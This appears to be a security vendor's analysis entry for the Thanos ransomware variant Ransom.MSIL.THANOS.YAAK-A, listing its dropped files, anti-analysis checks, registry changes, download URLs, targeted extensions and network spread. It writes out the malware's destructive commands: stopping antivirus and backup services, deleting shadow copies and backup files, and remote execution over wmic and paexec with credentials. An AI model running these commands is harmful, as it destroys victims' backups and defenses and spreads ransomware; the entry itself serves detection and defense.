Ransom.MSIL.THANOS.YAAK-A

This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It executes then deletes itself afterward.

It downloads a file from a certain URL then renames it before storing it in the affected system.

It drops files as ransom note. It avoids encrypting files with the following file extensions.

Arrival Details

This Ransomware arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Ransomware drops the following files:

• %User Startup%\mystartup.lnk → points to %User Temp%\HOW_TO_DECYPHER_FILES.txt
• %User Temp%\tmp{4 Hex Characters}.bat → For Mounting FreeDrives & Making Shared Folders Writable

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

It adds the following processes:

• powershell.exe Set-MpPreference -EnableControlledFolderAccess Disabled
• net.exe stop avpsus /y
• net.exe stop McAfeeDLPAgentService /y
• net.exe stop mfewc /y
• net.exe stop BMR Boot Service /y
• net.exe stop NetBackup BMR MTFTP Service /y
• net.exe stop DefWatch /y
• net.exe stop ccEvtMgr /y
• net.exe stop ccSetMgr /y
• net.exe stop SavRoam /y
• net.exe stop RTVscan /y
• net.exe stop QBFCService /y
• net.exe stop QBIDPService /y
• net.exe stop Intuit.QuickBooks.FCS /y
• net.exe stop QBCFMonitorService /y
• net.exe stop YooBackup /y
• net.exe stop YooIT /y
• net.exe stop zhudongfangyu /y
• net.exe stop stc_raw_agent /y
• net.exe stop VSNAPVSS /y
• net.exe stop VeeamTransportSvc /y
• net.exe stop VeeamDeploymentService /y
• net.exe stop VeeamNFSSvc /y
• net.exe stop veeam /y
• net.exe stop PDVFSService /y
• net.exe stop BackupExecVSSProvider /y
• net.exe stop BackupExecAgentAccelerator /y
• net.exe stop BackupExecAgentBrowser /y
• net.exe stop BackupExecDiveciMediaService /y
• net.exe stop BackupExecJobEngine /y
• net.exe stop BackupExecManagementService /y
• net.exe stop BackupExecRPCService /y
• net.exe stop AcrSch2Svc /y
• net.exe stop AcronisAgent /y
• net.exe stop CASAD2DWebSvc /y
• net.exe stop CAARCUpdateSvc /y
• net.exe stop sophos /y
• sc.exe config SQLTELEMETRY start= disabled
• sc.exe config SQLTELEMETRY$ECWDB2 start= disabled
• sc.exe config SQLWriter start= disabled
• sc.exe config SstpSvc start= disabled
• taskkill.exe /IM mspub.exe /F
• taskkill.exe /IM mydesktopqos.exe /F
• taskkill.exe /IM mydesktopservice.exe /F
• vssadmin.exe Delete Shadows /all /quiet
• vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=401MB
• vssadmin.exe resize shadowstorage /for=c: /on=c: /maxsize=unbounded
• vssadmin.exe resize shadowstorage /for=d: /on=d: /maxsize=401MB
• vssadmin.exe resize shadowstorage /for=d: /on=d: /maxsize=unbounded
• vssadmin.exe resize shadowstorage /for=e: /on=e: /maxsize=401MB
• vssadmin.exe resize shadowstorage /for=e: /on=e: /maxsize=unbounded
• vssadmin.exe resize shadowstorage /for=f: /on=f: /maxsize=401MB
• vssadmin.exe resize shadowstorage /for=f: /on=f: /maxsize=unbounded
• vssadmin.exe resize shadowstorage /for=g: /on=g: /maxsize=401MB
• vssadmin.exe resize shadowstorage /for=g: /on=g: /maxsize=unbounded
• vssadmin.exe resize shadowstorage /for=h: /on=h: /maxsize=401MB
• vssadmin.exe resize shadowstorage /for=h: /on=h: /maxsize=unbounded
• del.exe /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
• del.exe /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
• del.exe /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
• del.exe /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
• del.exe /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
• del.exe /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
• cmd.exe /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
• %System%\cmd.exe /C %User Temp%\tmp{4 Hex Characters}.bat
• %System%\notepad.exe %Desktop%\HOW_TO_DECYPHER_FILES.txt
• %System%\cmd.exe /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "%s" & Del /f /q "%s"
• %System%\cmd.exe /C choice /C Y /N /D Y /T 3 & Del "{Malware FilePath}\{Malware Filename}"

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %Desktop% is the current user's desktop, which is usually C:\Documents and Settings\{User Name}\Desktop on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\Desktop on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

It executes then deletes itself afterward.

It adds the following mutexes to ensure that only one of its copies runs at any one time:

• Global\3747bdbf-0ef0-42d8-9234-70d68801f407

It terminates itself if it finds the following processes in the affected system's memory:

• CFF Explorer
• de4dot
• dnspy
• dnspy-x86
• dotpeek
• dotpeek64
• dumpcap
• effetech http sniffer
• fiddler
• firesheep
• http analyzer stand-alone
• HTTPNetworkSniffer
• ida64
• IEWatch Professional
• ilspy
• intercepter
• Intercepter-NG
• LordPE
• MegaDumper
• NetworkMiner
• NetworkTrafficView
• NoFuserEx
• ollydbg
• PEiD
• pe-sieve
• procexp
• procexp64
• protection_id
• RDG Packer Detector
• sysinternals tcpview
• tcpdump
• UnConfuserEx
• Universal_Fixer
• wireshark
• wireshark portable
• x32dbg
• x64dbg

Other System Modifications

This Ransomware modifies the following registry entries:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
CurrentVersion\Policies\System
EnableLinkedConnections = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
CurrentVersion\Policies\System
LocalAccountTokenFilterPolicy = 1

Download Routine

This Ransomware downloads files from the following URLs then renames them before storage in the affected system:

• https://raw.{BLOCKED}usercontent.com/d35ha/ProcessHide/master/bins/ProcessHide{XX}.exe → %User Temp%\{8 Random Characters}.exe
  Where {XX} can be 32 or 64 depending on the OS architecture.
• https://www.{BLOCKED}min.com/paexec/paexec.exe → %User Temp%\{8 Random Characters}.exe

Other Details

This Ransomware encrypts files with the following extensions:

• 7z
• accdb
• aes
• aiff
• asm
• avi
• backup
• bak
• bco
• bz2
• cdx
• cert
• class
• cpp
• cs
• csr
• csv
• dat
• dbf
• dim
• djvu
• doc
• docm
• docx
• dtsx
• dwg
• edb
• eml
• flac
• fpt
• gif
• gpg
• htm
• html
• hwp
• java
• jpeg
• jpg
• key
• lay6
• ldf
• lgb
• log
• lst
• m4a
• mdb
• mdf
• mkv
• mov
• mp3
• mp4
• mpeg
• mrimg
• msg
• myd
• nd
• ndf
• nef
• odb
• odg
• ods
• odt
• one
• ora
• ost
• p12
• pas
• pdf
• pem
• pfx
• php
• png
• ppt
• pptx
• psd
• pst
• qbb
• qbw
• rar
• raw
• rdl
• rtf
• sql
• sqlite3
• sqlitedb
• svg
• sxi
• sxw
• tar
• tbl
• tiff
• tlg
• txt
• vbk
• vbm
• vdi
• vib
• vmdk
• vmx
• vsd
• wav
• xdw
• xls
• xlsm
• xlsx
• zip

It does the following:

• It clears Recycle Bin contents
• It makes use of the following commands to hide itself from the following processes:
  • Processes:
    • taskmgr
    • Taskmgr
    • procexp
    • procexp64
    • ProcessHacker
  • Commands:
    • %User Temp%\{8 Random Characters}.exe {Process ID} {Malware Filename}.exe
    • %User Temp%\{8 Random Characters}.exe {Process ID} {Malware Filename}.exe *32
• It encrypts Local Drives and (If ran with administrator privileges) Network Drives.
• To encrypt Network Drives it does the following:
  • It checks if the IP address found starts with:
    • 10.
    • 172.16.
    • 192.168.
  • It copies itself to \\{IP Address}\Users\Public\{Malware Name}.exe
  • It adds the following processes:
    • net.exe user \\{IP Address} /USER:{DOMAIN}\{UserName} {Password}
    • wmic.exe /node:{IP Address} /user:{DOMAIN}\{UserName} /password:{Password} process call create cmd.exe /c \\{IP Address}\Users\Public\{Malware Name}
    • %User Temp%\{8 Random Characters}.exe \\{IP Address} -u {DOMAIN}\{UserName} -p {Password} -d -f -h -s -n 2 -c {Malware FilePath}\{Malware Filename}

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

Ransomware Routine

This Ransomware avoids encrypting files with the following strings in their file name:

• autoexec.bat
• desktop.ini
• autorun.inf
• ntuser.dat
• iconcache.db
• bootsect.bak
• boot.ini
• ntuser.dat.log
• thumbs.db
• bootmgr
• pagefile.sys
• config.sys
• ntuser.ini
• Builder_Log
• RSAKeys
• HOW_TO_DECYPHER_FILES
• Recycle.Bin
• {Malware Filename}

It avoids encrypting files with the following strings in their file path:

• Program Files
• Windows
• Perflogs
• Internet Explorer
• ProgramData
• AppData

It appends the following extension to the file name of the encrypted files:

• .locked

It drops the following file(s) as ransom note:

• %User Temp%\HOW_TO_DECYPHER_FILES.txt
• %Desktop%\HOW_TO_DECYPHER_FILES.txt
• {Encrypted Directory}\HOW_TO_DECYPHER_FILES.txt
  

It avoids encrypting files with the following file extensions:

• .locked
• .exe
• .EXE
• .dll
• .DLL